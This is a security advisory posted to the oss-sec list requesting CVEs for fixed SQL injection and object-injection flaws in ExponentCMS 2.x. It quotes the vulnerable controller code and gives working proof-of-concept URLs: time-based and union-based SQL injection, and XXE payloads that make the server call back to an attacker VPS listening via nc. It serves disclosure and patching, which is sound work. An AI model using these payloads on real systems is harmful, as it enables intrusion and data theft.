oss-sec mailing list archives
CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities
From: Carl Peng <felixk3y () gmail com>
Date: Fri, 30 Sep 2016 12:22:38 +0800
hello, I reported the following vulnerabilities to the ExponentCMS team some days ago, and now has been fixed. 1) sqli-1 /framework/modules/ecommerce/controllers/cartController.php lines 61 - 66: ``` $product_type = isset($this->params['product_type']) ? $this->params['product_type'] : 'product'; $product = new product(); //if we're trying to add a parent product ONLY, then we redirect to it's show view $c = new stdClass(); if (isset($this->params['product_id']) && empty($this->params['children'])) $c = $product->find('first', 'parent_id=' . $this->params['product_id']); //sqli if (!empty($c->id)) { flash('message', gt("Please select a product and quantity from the options listed below to add to your cart.")); redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=> $this->params['product_id'])); } ``` the parameter of "product_id" fail to filtered, we can input "product_id=sqli" to execute SQL statements. Proof of concept: /index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23 2) sqli-2 /framework/modules/help/controllers/helpController.php lines 122 - 131: ``` if (empty($this->params['version']) || $this->params['version'] == 'current') { $version_id = help_version::getCurrentHelpVersionId(); } else { $version_id = help_version::getHelpVersionId($this->params['version']); //sqli if (empty($version_id)) { $version_id = help_version::getCurrentHelpVersionId(); } } $doc = $help->find('first', 'help_version_id='.$version_id.' AND sef_url="'.$this->params['title'].'"'); //sqli $children = $help->find('count','parent='.$doc->id); ``` The parameters of "version" and "title" fail to filtered, we can input "version=sqli" or "title=sqli"to execute SQL statements. Proof of concept: /index.php?controller=help&action=show&version=1" union select 1%23&title=aaa" union select 1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23 3) Object Injection -1 /framework/modules/core/controllers/expTagController.php#L228-L232 ``` foreach ($this->params['change_tag'] as $item) { // $item from user input $params['expTag'] = array(); $classname = $this->params['mod']; $object = new $classname($item); // $classname also from user input expTag::deleteTag($this->params['mod'], $object->id); //... } ``` Proof of concept(XXE): [ We could use php class "SimpleXMLElement"( http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ] step 1: VPS listening.. (nc -lvvp 8080) step 2: /index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E 4) Object Injection -2 /framework/modules/core/controllers/expCatController.php#L175-L182 ``` if (!empty($this->params['change_cat'])) { foreach ($this->params['change_cat'] as $item) { $classname = $this->params['mod']; $object = new $classname($item); $params['expCat'][0] = $this->params['newcat']; $object->update($params); } } ``` Proof of concept(XXE): [ We could use php class "SimpleXMLElement"( http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ] step 1: VPS listening.. (nc -lvvp 8080) step 2: /index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E [root@cloud ~]# nc -lvvp 8080 Listening on any address 8080 (webcache) Connection from 8.8.8.8:63017 GET /xxe_exists HTTP/1.0 Host: your_vps_ip:8080 And now, all vulnerabilities have been fixed. https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2 https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db these issues was reported by Peng Hua of silence.com.cn Inc. and I would like to request CVEs for these issues (if not done so). -------------------http://www.silence.com.cn/ penghua () silence com cn PKAV Team
Current thread:
- CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities Carl Peng (Sep 30)